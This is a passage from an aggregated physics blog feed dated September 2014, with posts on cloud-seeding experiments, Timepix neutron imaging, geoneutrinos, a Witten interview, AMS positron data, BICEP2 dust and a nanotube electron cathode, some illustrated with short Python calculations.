The CLOUD team now consists of 80 scientists from 17 different institutions in nine countries. They receive funding from CERN, a variety of other organizations in Europe and Russia, and the National Science Foundation. The collaboration has published several papers in Nature and Science that have established the main vapors responsible for formation of cloud seeds.

Getting started was difficult, though, Kirkby says, because funding for cross-disciplinary projects can be difficult to secure. “You fall between the cracks of traditional funding agencies,” he says. “Interdisciplinary research can be a high-risk venture, like a start-up. It’s not for the faint-hearted. But you have the possibility to make disruptive scientific advances.”

One tool for many scientists

Sometimes, instead of a research puzzle, you have a tool just waiting for a new problem to solve.

Anton Tremsin, a researcher at the Space Science Laboratory at UC Berkeley, works with Timepix, a chip that rapidly collects and digitizes signals from particles. The chip is based on technology initially developed to measure particles in accelerator experiments at CERN.

Timepix chips can be used in neutron imaging, which works somewhat like X-ray imaging. In an X-ray image on film, areas with the highest density or the heaviest elements—for example, the bones or teeth in an X-ray of a body—look the brightest. Dense areas contain the most electrons, which interact with the X-rays and stop them from passing through to leave their mark on the film.

Neutrons, however, interact with the nuclei of atoms. So a neutron image can be more nuanced than an X-ray image. It can distinguish between many types of materials, each of which affects the neutrons in a different way. Neutron imaging can reveal the different organs inside a horsefly, show the concentration of hydrogen in a metal or find a flower growing behind a granite wall.

Today, Timepix is used to test the stability of aircraft, to examine ancient Japanese swords and to evaluate meteorite samples, among other diverse projects.

“It’s been so variable in terms of applications,” Tremsin says. “I couldn’t even predict how Timepix might be used in the future.”

The collaboration involved in developing Timepix is large, with dozens of groups actively using the technology. With funding from NASA, NSF and the Department of Energy, Tremsin works with two Timepix chips he built at UC Berkeley and later installed at Rutherford Appleton Laboratory in Oxfordshire, England, and at Oak Ridge National Laboratory in Tennessee. Both of these labs are hubs for neutron imaging.

A colleague at Oak Ridge National Laboratory put Tremsin in contact with Yan Gao, a senior scientist at GE Global Research in Schenectady, New York. Gao uses Timepix to evaluate turbine blades used for aircraft engines and generators.

The two researchers have now been working together for more than a year.

“It’s been a fruitful and active collaboration,” Gao says. “Anton not only has scientific talent, but he’s also persistent in trying to use his detector to solve real-world problems.”

The blades for aircraft engines must be made of a material that can withstand stress under high temperatures, Gao says. “To develop such a material, you need to understand the microstructure,” he says. “And to do this type of imaging well, you need a detector with high resolution like Timepix.”

Gao often works with researchers at universities and national labs. He says frequent communication with a wide range of scientists is key to ensuring that people with useful tools meet people with interesting research questions.

Tremsin has also paired up with Ed Perfect, professor of earth and planetary sciences at the University of Tennessee.

For Perfect, the allure of Timepix is its ability to monitor changes over time. He uses Timepix chips to look at the ways hydrogen-rich liquids such as water and oil travel through different earth materials. Understanding this movement is important for a broad range of processes, including hydraulic fracturing and enhanced oil recovery.

To study the flow of fluid through sandstone and shale, Perfect brings water into contact with the base of fractured rock cores at Oak Ridge’s CG-1D neutron imaging beam line. The water is drawn into the fracture zone upon contact. Perfect says he has been surprised by how quickly fluids can move through these porous media.

“With the imaging from this detector, we are able to capture dynamic processes we’ve not really seen before,” Perfect says. “In fact, I’m still scratching my head about how to interpret the observations, because it’s not explained by our traditional theory.”

Although its list of applications is already quite long, Tremsin still thinks there are more ways to use Timepix. “We’re still trying to demonstrate what can be done and what can be measured,” he says. “I hope there will be many more new applications.”

Using neutrinos to discover what's beneath our feet

Bill McDonough, professor of geology at the University of Maryland, first connected with particle physics when he was asked to review a paper submitted to Nature in 2005. The paper announced the detection of geoneutrinos—neutrinos emitted during the radioactive decay of uranium and thorium in the Earth’s interior—by the KamLAND experiment in Japan.

McDonough had never been asked to serve as a reviewer for a particle physics publication. He was intrigued, in part because a decade earlier he had written a paper about the estimated abundance of different elements, including uranium, in the Earth’s interior.

“Like others, I made a hypothesis, but I never thought we’d be able to measure how much uranium is inside the Earth,” McDonough says.

The KamLAND geoneutrinos result wound up making the cover of Nature. “The first detection of geoneutrinos from beneath our feet is a landmark result,” McDonough wrote in the introduction to the article. “It will allow better estimation of the abundances and distributions of radioactive elements in the Earth, and of the Earth's overall heat budget.”

Of all the elements, three—uranium, thorium and potassium—produce over 99 percent of the heat from one of the two sources of Earth’s interior energy, radioactive decay. The other source is primordial energy, kinetic energy leftover from the formation of the Earth and its core.

Earth’s interior energy powers a long list of big processes on the Earth’s surface: plate tectonics, the formation and movement of new oceanic crust; subduction, the movement of an oceanic plate beneath the crust and inside the Earth; convection, the stirring of the mantle; and also the creation of the magnetosphere through convection in the liquid outer core.

After the Nature paper was published, one of the authors, John Learned, a professor and member of the high-energy physics group at the University of Hawaii, called McDonough to discuss working together to measure the Earth’s energy budget with geoneutrinos.

“Since then, we’ve been trading information at a high rate,” Learned says. “Bill has given us the data and geological models we need to predict the neutrino flux.”

There are ways to measure the heat coming out of the planet. But before geoneutrinos, it was difficult to know its source. “As a chemist, I would like to take the Earth, dissolve it in a beaker and then analyze it and tell you exactly what its composition is,” McDonough says. “There are of course consequences to dissolving the Earth.”

McDonough receives most of his funding from NSF. But geoneutrino studies are truly a global effort, with currently operating detectors in Japan and Italy, one coming online soon in Canada and another planned in China. Learned and McDonough are working together to plan a detector, to be constructed in Hawaii, that can be moved around on the ocean floor.

“We help each other understand the other’s field,” McDonough says. “We all have a high level of curiosity and drive to answer these questions.”

It takes years to get results from geoneutrino experiments. The detector in Japan sees about one geoneutrino every month, and the detector in Italy one every two to three months. But all the while, scientists are learning.

“We know less about the center of the Earth than we do about the sun,” Learned says. “We do not understand what’s beneath our feet, except for a few kilometers down. Neutrinos give us a chance to probe.”

When sciences meet

Researchers are using particle physics technology to understand some of the biggest processes on the planet and to observe its tiniest and most inaccessible nooks and crannies.

The partnerships forged to do this research can bring new energy as new ideas flow, Kirkby says. “Scientists tend to get specialized, but you get a chance to break away from that,” he says.

“And it’s a lot of fun to learn so much new stuff.” When scientists get creative, it creates opportunities for better science, with exciting results.


Like what you see? Sign up for a free subscription to symmetry!

by Amanda Solliday at September 23, 2014 01:00 PM

Lubos Motl - string vacua and pheno

An interview with Edward Witten at a bizarre place
Most events in the "science journalism" of the recent years have been really strange, to put it extremely mildly. So the following thing is probably just another example of the rule. But listen.

John Horgan is a loud, violent, and obnoxious critic of science who believes that science has ended. In fact, he has also written extensive texts about the end of mathematics. The oppressive numbers, functions, and groups have collapsed and all this fantasy called mathematics is over, Horgan has informed his readers.

Before he published a loony "book" titled "The End of Science" sometime in the mid 1990s, he would also interview Edward Witten (in 1991). Well, the word "interview" is too strong. Horgan himself had to admit that it was a childish yet brutally malicious assault on theoretical physics in general, string theory in particular, and Witten as a person.

Now, in the wake of the Kyoto Prize that Witten won – congratulations but no surprise – we may read another interview with Witten in the Scientific American's blogs hosted by... John Horgan.
Physics Titan Edward Witten Still Thinks String Theory “On the Right Track”
I don't actually know whether Witten knew that he was being interviewed by e-mail but the text surely makes you believe that he did and we're told that some "publicist" behind the Kyoto Prize had to choose Horgan as the "interviewer". Oh my God.

In the new interview, John Horgan clearly presents himself as Edward Witten's peer – to say the least. But even a kid in a kindergarten would be able to see that these two men differ. For one thing, the names they each invoke are very different.

Aside from less shocking names, Horgan offers such "monster minds" as Peter W*it and Sean Carroll to make some of his points. Witten prefers to refer to physicists like Steve Weinberg, Lenny Susskind, and Martin Rees. The kid in the kindergarten could perhaps notice the 20 floors of the skyscraper in between these two groups of "authorities".

Witten is asked – with an apparent malicious intent of Horgan's – whether he is "still" (why the hell is there the word "still"?) confident that string theory will turn out to be "right" (these quotes around "right" are there). Witten's answer is that he wouldn't have to modify what he said in 1991. It means Yes.

Does string theory have rivals? The answer by the most cited theoretical physicist (and perhaps scientist) is that there are not any interesting competing suggestions. Be sure that people attending my popular talks (and sometimes radio hosts etc.) often ask the same question and I give the same answer. One reason, as Witten reminds us, is that ideas that actually have something good about them, like twistors and noncommutative geometry, are gradually identified as aspects of string theory itself and absorbed by string theory. It's just how the things are.

Horgan also promotes his and his pals' pet idea that string theory has to be unscientific because it predicts the landscape. Witten calmly and carefully answers that the landscape simply may be genuine, certain quantities may be incalculable from the first principles, and we just can't or shouldn't fight against this reality. In fact, even in such a case, the existence of the landscape and the incalculability of many things may get scientifically established, in one of the several possible scenarios he outlines. Witten also mentions the prediction of the tiny positive cosmological constant as a big success of this reasoning.

Concerning falsification, well-defined predictions that are empirically validated or falsified are the "gold standard" of science, Witten says, but it's way too narrow-minded to imagine that all of science works in this way. Instead, much or most of science is about efforts to discover things – even though, in principle, even discoveries of new things may be awkwardly interpreted as the "falsification of hypotheses that these new things don't exist".

Horgan seems to repeat the same "question" about thrice – whether the multiverse is scientific – and Witten generously takes Horgan's being slow and retarded into account and he patiently answers the same question thrice, too. The multiverse may be a feature of Nature so even if it is inconvenient for our abilities to make predictions, we must take this possibility into account and collect evidence whether it is right or wrong, and if it is right, learn more details about it. Nature isn't obliged to make the physicists' lives convenient.

Can science explain how exactly the Universe was born? Witten first tries to correct Horgan's constantly overhyped vocabulary – like "the exact understanding". We want a better understanding and there's been lots of progress with inflation, some spectral lines, and so on. One staggering aspect of the interview is Horgan's "errata". For example, Witten mentions that the evidence supporting inflationary cosmology is vastly greater than it was in 1991. The readers are offered an erratum from a superior mind (and Witten's new supervisor?) John Horgan, however:
[Horgan: I don't accept that the evidence for inflation is "vastly greater" now than in 1996. See my post on inflation under Further Reading.]
Wow, this is just incredible. Who does he think he is? Even among science journalists, he belongs to the bottom 20%, and even if he managed to reach the average, the average science journalist's IQ is about 50 points below that of the leading theoretical physicists (and they have a correspondingly lower knowledge). And the person who was interviewed wasn't just a leading theoretical physicist. It was Edward Witten himself. Why do you ask questions about fundamental physics to Prof Witten, Mr Horgan, if you are so much smarter than he is? Why do you need to interview the Kyoto Prize winners? You could write your better answers by yourself, or with the help from Peter W*it, Lee Sm*lin, or any troll you may find on the Internet (I can give you a dozen e-mails of such "geniuses" accumulated in the blacklist on this very blog).

Finally, when asked about philosophy and religion, Witten answers that he prefers science and "philosophers of Nature" such as Maxwell.

If you haven't lost your breath yet, there is an extra cherry on a pie for you. Now, when I am writing this report, the interview with the world's most cited physicist has exactly one comment – by a man named Carlo Rovelli (a loop quantum gravity "thinker" who recently cried that it was so bad for science to separate from theology and other humanities) who offers his own delusions about string theory's being on a wrong track and a wish that Horgan should have used a talking point about supersymmetry at the very beginning. You may see that people like Rovelli aren't really on the "science side" of these disagreements. They have nothing to do with quality scientific research; they are on the side of the likes of John Horgan and their empty skulls.

The interview, its location, organization, and overall appearance seem so insulting that I would be ready to believe the hypothesis that an enemy of Edward Witten decided to award him the Kyoto Prize so that Witten may be humiliated in this way. The disconnect between the quality physics research and the junk that most of the laymen are being served is so extreme that the communication is sort of pointless – except that sometimes physicists may be forced to communicate with the likes of John Horgan, e.g. if they win a prize and an organizer wants to have some painful kind of fun.

by Luboš Motl ( at September 23, 2014 10:13 AM

Clifford V. Johnson - Asymptotia

STEM Keynote
As I mentioned, a couple of Saturdays ago I gave the keynote address at a one-day conference designed to introduce STEM Careers to underrepresented students from various neighboring schools. The event* was co-sponsored by the Level Playing Field Institute, but sadly the details of it seem to have vanished from their site now that the event has passed, which is unfortunate. It was good to see a room full of enthusiastic students wanting to learn more about such careers (STEM = Science, Technology, Engineering and Mathematics) and I tried to give some thoughts about some of the reasons that there's such poor representation by people of color (the group I was asked to focus on, although I mentioned that many of my remarks also extended to women to some extent) in such fields, and what can be done about it. Much of my focus, as you can guess from the issues I bring up here from time to time, was on battling the Culture: The perception people have of who "belongs" and who does not, and how that perception makes people act, consciously or otherwise, the images we as a society present and perpetuate in our media and in our conversations and conventions throughout everyday life, and so on. I used my own experience as an example at various points, which may or may not have been helpful - I don't know. My experience, in part and in brief, is this: I went a long way into being excited [...] Click to continue reading this post

by Clifford at September 23, 2014 01:33 AM

September 22, 2014

Symmetrybreaking - Fermilab/SLAC

Cosmic dust proves prevalent

Space dust accounts for at least some of the possible signal of cosmic inflation the BICEP2 experiment announced in March. How much remains to be seen.

Space is full of dust, according to a new analysis from the European Space Agency’s Planck experiment.

That includes the area of space studied by the BICEP2 experiment, which in March announced seeing a faint pattern left over from the big bang that could tell us about the first moments after the birth of the universe.

The Planck analysis, which started before March, was not meant as a direct check of the BICEP2 result. It does, however, reveal that the level of dust in the area BICEP2 scientists studied is both significant and higher than they thought.

“There is still a wide range of possibilities left open,” writes astronomer Jan Tauber, ESA project scientist for Planck, in an email. “It could be that all of the signal is due to dust; but part of the signal could certainly be due to primordial gravitational waves.”

BICEP2 scientists study the cosmic microwave background, a uniform bath of radiation permeating the universe that formed when the universe first cooled enough after the big bang to be transparent to light. BICEP2 scientists found a pattern within the cosmic microwave background, one that would indicate that not long after the big bang, the universe went through a period of exponential expansion called cosmic inflation. The BICEP2 result was announced as the first direct evidence of this process.

The problem is that the same pattern, called B-mode polarization, also appears in space dust. The BICEP2 team subtracted the then known influence of the dust from their result. But based on today’s Planck result, they didn’t manage to scrub all of it.

How much the dust influenced the BICEP2 result remains to be seen.

In November, Planck scientists will release their own analysis of B-mode polarization in the cosmic microwave background, in addition to a joint analysis with BICEP2 specifically intended to check the BICEP2 result. These results could answer the question of whether BICEP2 really saw evidence of cosmic inflation.

“While we can say the dust level is significant,” writes BICEP2 co-leader Jamie Bock of Caltech and NASA’s Jet Propulsion Laboratory, “we really need to wait for the joint BICEP2-Planck paper that is coming out in the fall to get the full answer.”



by Kathryn Jepsen at September 22, 2014 06:03 PM

Quantum Diaries

Breakthrough: nanotube cathode creates more electron beam than large laser system

This article appeared in Fermilab Today on Sept. 22, 2014.

Harsha Panunganti of Northern Illinois University works on the laser system (turned off here) normally used to create electron beams from a photocathode. Photo: Reidar Hahn


Lasers are cool, except when they’re clunky, expensive and delicate.

So a collaboration led by RadiaBeam Technologies, a California-based technology firm actively involved in accelerator R&D, is designing an electron beam source that doesn’t need a laser. The team, led by Luigi Faillace, a scientist at RadiaBeam, is testing a carbon nanotube cathode — about the size of a nickel — that completely eliminates the need for the room-sized laser system currently used to generate the electron beam. The tests are taking place in Fermilab’s High-Brightness Electron Source Lab (HBESL).

Fermilab, one of relatively few labs that can support this project, was sought out to test the experimental cathode because of its capability and expertise in handling intense electron beams.

Tests have shown that the vastly smaller cathode does a better job than the laser. Philippe Piot, a staff scientist in the Fermilab Accelerator Division and a joint appointee at Northern Illinois University, says tests have produced beam currents a thousand to a million times greater than the one generated with a laser. This remarkable result means that electron beam equipment used in industry may become not only less expensive and more compact, but also more efficient. A laser like the one in HBESL runs close to half a million dollars, Piot said, about a hundred times more than RadiaBeam’s cathode.

The technology has extensive applications in medical equipment and national security, as an electron beam is a critical component in generating X-rays. And while carbon nanotube cathodes have been studied extensively in academia, Fermilab is the first facility to test the technology within a full-scale setting.

“People have talked about it for years,” said Piot, “but what was missing was a partnership between people that have the know-how at a lab, a university and a company.”

The dark carbon-nanotube-coated area of this field emission cathode is made of millions of nanotubes that function like little lightning rods. At Fermilab's High-Brightness Electron Source Lab, scientists have tested this cathode in the front end of an accelerator, where a strong electric field siphons electrons off the nanotubes to create an intense electron beam. Photo: Reidar Hahn


Piot and Fermilab scientist Charles Thangaraj are partnering with RadiaBeam Technologies staff Luigi Faillace and Josiah Hartzell and Northern Illinois University student Harsha Panuganti and researcher Daniel Mihalcea. A U.S. Department of Energy Small Business Innovation Research grant, a federal endowment designed to bridge the R&D gap between basic research and commercial products, funds the project. The work represents the kind of research that will be enabled in the future at the Illinois Accelerator Research Center — a facility that brings together Fermilab expertise and industry.

The new cathode appears at first glance like a smooth black button, but at the nanoscale it resembles, in Piot’s words, “millions of lightning rods.”

“When you apply an electric field, the field lines organize themselves around the rods’ extremities and enhance the field,” Piot said. The electric field at the peaks is so intense that it pulls streams of electrons off the cathode, creating the beam.

Traditionally, lasers strike cathodes in order to eject electrons through photoemission. Those electrons form a beam by piggybacking onto a radio-frequency wave, synchronized to the laser pulses and formed in a resonance cavity. Powerful magnets focus the beam. The tested nanotube cathode requires no laser as it needs only the electric field already generated by the accelerator to siphon the electrons off, a process dubbed field emission.
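Field emission of this kind is commonly modeled with the Fowler-Nordheim equation, in which the emitted current density depends exponentially on the local electric field. The sketch below is not from the article — the work function, macroscopic field, and field-enhancement factor are illustrative guesses — but it shows why the "lightning rod" geometry matters: enhancing the field at the tips turns a negligible current into an enormous one.

```python
import math

def fowler_nordheim_current_density(field_v_per_m, work_function_ev):
    """Elementary Fowler-Nordheim current density (A/m^2).

    J = (a * F^2 / phi) * exp(-b * phi^(3/2) / F)
    with a ~ 1.54e-6 A eV V^-2 and b ~ 6.83e9 eV^(-3/2) V/m.
    """
    a, b = 1.54e-6, 6.83e9
    F, phi = field_v_per_m, work_function_ev
    return (a * F**2 / phi) * math.exp(-b * phi**1.5 / F)

phi = 4.8        # assumed work function for carbon nanotubes, eV
F_macro = 1e7    # illustrative accelerating field, 10 MV/m
beta = 1000      # illustrative geometric field-enhancement factor at a tip

j_flat = fowler_nordheim_current_density(F_macro, phi)        # effectively zero
j_tip = fowler_nordheim_current_density(beta * F_macro, phi)  # enormous
print(f"flat surface: {j_flat:.3g} A/m^2, nanotube tip: {j_tip:.3g} A/m^2")
```

The exponential sensitivity to the local field is the whole story here: a thousandfold geometric enhancement at the tips takes the exponent from hopeless to order one.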

The intense electric field, though, has been a tremendous liability. Piot said critics thought the cathode “was just going to explode and ruin the electron source, and we would be crying because it would be dead.”

One of the first discoveries Piot’s team made when they began testing in May was that the cathode did not, in fact, explode and ruin everything. The exceptional strength of carbon nanotubes makes the project feasible.

Still, Piot continues to study ways to optimize the design of the cathode to prevent any smaller, adverse effects that may take place within the beam assembly. Future research also may focus on redesigning an accelerator that natively incorporates the carbon nanotube cathode to avoid any compatibility issues.

Troy Rummler

by Fermilab at September 22, 2014 02:50 PM

Lubos Motl - string vacua and pheno

A simple explanation behind AMS' electron+positron flux power law?
Aside from tweets about the latest, not so interesting, and inconclusive Planck paper on the dust and polarized CMB, Francis Emulenews Villatoro tweeted the following suggestive graphs to his 7,000+ Twitter followers:

The newest data from the Alpha Magnetic Spectrometer are fully compatible with the positron flux curve resulting from an annihilating dark matter particle lighter than \(1\TeV\). But the steep drop itself hasn't been seen yet (the AMS' dark matter discovery is one seminar away but it may always be so in the future LOL) and the power-law description seems really accurate and attractive.

What if neither dirty pulsars nor dark matter is the cause of these curves? All of those who claim to love simple explanations and who sometimes feel annoyed that physics has gotten too complicated are invited to think about the question.

The fact at this moment seems to be that above the energy \(30\GeV\) and perhaps up to \(430\GeV\) or much higher, the positrons represent \(0.15\) of the total electron+positron flux. Moreover, this flux itself depends on the energy via a simple power law:\[

\Phi(e^- + e^+) = C \cdot E^\gamma

\] where the exponent \(\gamma\) has a pretty well-defined value.

Apparently, things work very well in that rather long interval if the exponent (spectral index) is\[

\gamma= -3.170 \pm 0.008 \pm 0.008

\] The first part of the error combines the systematic and statistical errors; the second comes from the energy-scale uncertainty. At any rate, the exponent is literally between \(-3.18\) and \(-3.16\), quite some lunch for numerologists.
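For the armchair physicists, a minimal numerical sketch of the fit quoted above; the normalization \(C\) is arbitrary here, since only the spectral index and the \(0.15\) positron fraction are quoted.

```python
def total_flux(E_gev, C=1.0, gamma=-3.170):
    """Total (e- + e+) flux ~ C * E^gamma, using the AMS spectral index."""
    return C * E_gev**gamma

def positron_flux(E_gev, fraction=0.15):
    """Positron flux, assuming the ~0.15 positron fraction quoted above."""
    return fraction * total_flux(E_gev)

# With gamma ~ -3.17, a tenfold rise in energy cuts the flux by 10^3.17 ~ 1480x:
ratio = total_flux(30.0) / total_flux(300.0)
print(f"flux(30 GeV)/flux(300 GeV) = {ratio:.0f}")
```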

My question for the numerologists and ingenious armchair physicists (and others!) reading this blog is: what in the Universe may produce such a power law for the positron and electron flux, with this bizarre negative exponent?

The thermal radiation is no good if the temperature \(kT\) is below those \(30\GeV\): you would get an exponential decrease. You may think about the thermal radiation in some decoupled component of the Universe whose temperature is huge, above \(430\GeV\), but then you will get something like \(\gamma=0\) or a nearby integer instead of the strange, large, and fractional negative constant.

You may continue by thinking about some sources distributed according to this power law, for example microscopic (but I mean much heavier than the Planck mass!) black holes. Such Hawking-radiating black holes might emit as many positrons as electrons so it doesn't look great but ignore this problem – there may be selective conversion to electrons because of some extra dirty effects, or enhanced annihilation of positrons.

If you want the Hawking radiation to have energy between \(30\) and \(430\GeV\), what is the radius and size of the black hole? How many black holes like that do you need to get the right power law? What will be their mass density needed to obtain the observed flux? Is this mass density compatible with the basic data about the energy density that we know?

Now, if that theory can pass all your tests, you also need the number of smaller i.e. lighter i.e. hotter microscopic black holes (those emitting higher-energy radiation) to be larger. Can you explain why the small black holes should dominate in this way? May the exponent \(-3.17\) appear in this way? Can you get this dominance of smaller black holes in the process of their gradual merger? Or thanks to the reduction of their sizes during evaporation?
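As a starting point for the homework above, here is a back-of-the-envelope sketch using the standard Hawking temperature formula \(T=\hbar c^3 / (8\pi G M k_B)\); the \(100\GeV\) target energy is my arbitrary choice in the middle of the quoted range.

```python
import math

# SI constants
hbar, c, G, k_B = 1.0546e-34, 2.998e8, 6.674e-11, 1.381e-23
GEV = 1.602e-10  # one GeV in joules

def hawking_mass(temperature_gev):
    """Black-hole mass (kg) whose Hawking temperature equals the given energy."""
    T = temperature_gev * GEV / k_B  # convert GeV to kelvin
    return hbar * c**3 / (8 * math.pi * G * k_B * T)

def schwarzschild_radius(mass_kg):
    """Schwarzschild radius r_s = 2GM/c^2 in meters."""
    return 2 * G * mass_kg / c**2

M = hawking_mass(100.0)       # ~1e8 kg: far above the Planck mass...
r = schwarzschild_radius(M)   # ...yet with a subatomic radius, ~1e-19 m
print(f"M ~ {M:.2g} kg, r_s ~ {r:.2g} m")
```

So the black holes in question would weigh about as much as a loaded cargo ship while being smaller than a proton; counting how many you need to reproduce the observed flux is left to the reader, as the text suggests.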

I am looking forward to your solutions – with numbers and somewhat solid arguments. You can do it! ;-)

A completely different explanation: the high-energy electrons and positrons could arise from some form of "multiple decoupling events" in the very high-energy sector of the world that isn't in thermal equilibrium with everything else. Can you propose a convincing model about the moments of decoupling and the corresponding temperature that would produce such high-energy particles?

by Luboš Motl ( at September 22, 2014 01:49 PM

Lubos Motl - string vacua and pheno

A pro-BICEP2 paper
Update Sep 22nd: a Planck paper on polarization is out, suggesting dust could explain the BICEP2 signal – or just 1/2 of it – but lacking the resolution to settle anything. A joint Planck-BICEP2 paper should be out in November but it seems predetermined that they only want to impose an upper bound on \(r\) so it won't be too strong or interesting, either.
It's generally expected that the Planck collaboration should present their new results on the CMB polarization data within days, weeks, or a month. Will they be capable of confirming the BICEP2 discovery – or refute it by convincing data?

Ten days ago, Planck published a paper on dust modelling:
Planck intermediate results. XXIX. All-sky dust modelling with Planck, IRAS, and WISE observations
I am not able to decide whether this paper has anything to say about the discovery of the primordial gravitational waves. It could be relevant but note that the paper doesn't discuss the polarization of the radiation at all.

Perhaps more interestingly, Wesley Colley and Richard Gott released their preprint
Genus Topology and Cross-Correlation of BICEP2 and Planck 353 GHz B-Modes: Further Evidence Favoring Gravity Wave Detection
that seems to claim that the data are powerful enough to confirm some influence of the dust yet defend the notion that the primordial gravitational waves have to represent a big part of the BICEP2 observation, too.

What did they do? Well, they took some new publicly available maps by Planck – those at the frequency 353 GHz (wavelength 849 microns). Recall that the claimed BICEP2 discovery appeared at the frequency 150 GHz (wavelength 2 millimeters).

They assume, hopefully for good reasons, that the dust's contribution to the data should be pretty much the same for these two frequencies, up to an overall normalization. Planck sees a lot of radiation at 353 GHz – if all of it were due to dust, the amount of dust would be enough to account for the whole BICEP2 signal.

However, if this were the case, the signals in the BICEP2 patch of the sky at these two frequencies would have to be almost perfectly correlated with each other. Instead, Colley and Gott see the correlation coefficient to be\[

15\% \pm 4\%

\] (does someone understand why the \(\rm\LaTeX\) percent sign has a tilde connecting the upper circle with the slash?) which is "significantly" (four-sigma) different from zero but it is still decidedly smaller than 100 percent. The fact that this correlation is much smaller than 100% implies that most of the BICEP2 signal is uncorrelated with what is classified as dust by the Planck maps or, almost equivalently, that most of the observations at 353 GHz in the BICEP2 region are due to noise, not dust.
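The dilution of the correlation by noise is easy to illustrate with a toy Monte Carlo: two maps sharing the same dust template but with independent noise are nearly perfectly correlated when the noise is small, and weakly correlated when the noise dominates. The pixel count and noise levels below are invented for illustration, not taken from the paper.

```python
import numpy as np

rng = np.random.default_rng(0)
n_pix = 100_000

# Toy sky: a common dust template, shared by both frequencies.
dust = rng.standard_normal(n_pix)

def observed_correlation(noise_150, noise_353):
    """Correlation of two maps sharing the dust signal but not the noise."""
    map_150 = dust + noise_150 * rng.standard_normal(n_pix)
    map_353 = dust + noise_353 * rng.standard_normal(n_pix)
    return np.corrcoef(map_150, map_353)[0, 1]

print(observed_correlation(0.1, 0.1))  # nearly noise-free: correlation close to 1
print(observed_correlation(3.0, 3.0))  # noise-dominated: correlation far below 1
```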

When they quantify all this logic, they conclude that about one-half of the BICEP2 signal is due to dust and the remaining one-half has to be due to the primordial gravitational waves; that's why their preferred \(r\), the tensor-to-scalar ratio, drops from BICEP2's most ambitious \(r=0.2\) to \(r=0.11\pm 0.04\), a value very nicely compatible with chaotic inflation. These "one-half" values aren't known very accurately but with the error margins they seem to work with, they still seem to see that the value \(r=0\) – i.e. non-discovery of the primordial gravitational waves – may be excluded at the 2.5-sigma level.


by Luboš Motl ( at September 22, 2014 01:17 PM

Tommaso Dorigo - Scientificblogging

Sam Ting On AMS Results: Dark Matter Might Be One Seminar Away
Last Friday Samuel Ting, the winner of the 1975 Nobel prize in Physics for the co-discovery of the J/ψ particle, gave a seminar in the packed CERN main auditorium on the latest results from AMS, the Alpha Magnetic Spectrometer installed on the international space station.

read more

by Tommaso Dorigo at September 22, 2014 12:14 PM

Jester - Resonaances

Dark matter or pulsars? AMS hints it's neither.
Yesterday AMS-02 updated their measurement of cosmic-ray positron and electron fluxes. The newly published data extend to positron energies of 500 GeV, compared to 350 GeV in the previous release. The central value of the positron fraction in the highest energy bin is one third of an error bar lower than the central value of the next-to-highest bin. This allows the collaboration to conclude that the positron fraction has a maximum and starts to decrease at high energies :] The sloppy presentation and unnecessary hype obscure the fact that AMS actually found something non-trivial. Namely, it is interesting that the positron fraction, after a sharp rise between 10 and 200 GeV, seems to plateau at higher energies at a value of around 15%. This sort of behavior, although not expected by popular models of cosmic-ray propagation, was actually predicted a few years ago, well before AMS was launched.

Before I get to the point, let's have a brief summary. In 2008 the PAMELA experiment observed a steep rise of the cosmic-ray positron fraction between 10 and 100 GeV. Positrons are routinely produced by scattering of high-energy cosmic rays (secondary production), but the rise was not predicted by models of cosmic-ray propagation. This prompted speculations about another (primary) source of positrons, from pulsars, supernovae or other astrophysical objects, to dark matter annihilation. The dark matter explanation is unlikely for many reasons. On the theoretical side, the large annihilation cross section required is difficult to achieve, and it is difficult to produce a large flux of positrons without producing an excess of antiprotons at the same time. In particular, the MSSM neutralino entertained in the latest AMS paper certainly cannot fit the cosmic-ray data for these reasons. When theoretical obstacles are overcome by skillful model building, constraints from gamma-ray and radio observations disfavor the relevant parameter space. Even if these constraints are dismissed due to large astrophysical uncertainties, the models poorly fit the shape of the electron and positron spectrum observed by PAMELA, AMS, and FERMI (see the addendum of this paper for a recent discussion). Pulsars, on the other hand, are a plausible but handwaving explanation: we know they are all around and we know they produce electron-positron pairs in the magnetosphere, but we cannot calculate the spectrum from first principles.

But maybe primary positron sources are not needed at all? The old paper by Katz et al. proposes a different approach. Rather than starting with a particular propagation model, it assumes the high-energy positrons observed by PAMELA are secondary, and attempts to deduce from the data the parameters controlling the propagation of cosmic rays. The logic is based on two premises. Firstly, while production of cosmic rays in our galaxy contains many unknowns, the production of different particles is strongly correlated, with the relative ratios depending on nuclear cross sections that are measurable in laboratories. Secondly, different particles propagate in the magnetic field of the galaxy in the same way, depending only on their rigidity (momentum divided by charge). Thus, from an observed flux of one particle, one can predict the production rate of other particles. This approach is quite successful in predicting the cosmic antiproton flux based on the observed boron flux. For positrons, the story is more complicated because of large energy losses (cooling) due to synchrotron and inverse-Compton processes. However, in this case one can do the exercise of computing the positron flux assuming no losses at all. The result corresponds to a roughly 20% positron fraction above 100 GeV. Since in the real world cooling can only suppress the positron flux, the value computed assuming no cooling represents an upper bound on the positron fraction.

Now, at lower energies, the observed positron flux is a factor of a few below the upper bound. This is already intriguing, as hypothetical primary positrons could in principle have an arbitrary flux, orders of magnitude larger or smaller than this upper bound. The rise observed by PAMELA can be interpreted as meaning that the suppression due to cooling decreases as positron energy increases. This is not implausible: the suppression depends on the interplay of the cooling time and the mean propagation time of positrons, both of which are unknown functions of energy. Once the cooling time exceeds the propagation time, the suppression factor is completely gone. In such a case the positron fraction should saturate the upper limit. This is what seems to be happening at the energies 200-500 GeV probed by AMS, as can be seen in the plot. Already the previous AMS data were consistent with this picture, and the latest update only strengthens it.

So, it may be that the mystery of cosmic ray positrons has a simple down-to-galactic-disc explanation. If further observations show the positron flux climbing above the upper limit or dropping suddenly, then the secondary production hypothesis would be invalidated. But, for the moment, the AMS data seem to be consistent with no primary sources, just assuming that the cooling time of positrons is shorter than predicted by the state-of-the-art propagation models. So, instead of dark matter, AMS might have discovered that models of cosmic-ray propagation need a fix. That's less spectacular, but still worthwhile.

Thanks to Kfir for the plot and explanations. 

by Jester ( at September 22, 2014 09:27 AM

Sean Carroll - Preposterous Universe

Planck Speaks: Bad News for Primordial Gravitational Waves?

Ever since we all heard the exciting news that the BICEP2 experiment had detected “B-mode” polarization in the cosmic microwave background — just the kind we would expect to be produced by cosmic inflation at a high energy scale — the scientific community has been waiting on pins and needles for some kind of independent confirmation, so that we could stop adding “if it holds up” every time we waxed enthusiastic about the result. And we all knew that there was just such an independent check looming, from the Planck satellite. The need for some kind of check became especially pressing when some cosmologists made a good case that the BICEP2 signal may very well have been dust in our galaxy, rather than gravitational waves from inflation (Mortonson and Seljak; Flauger, Hill, and Spergel).

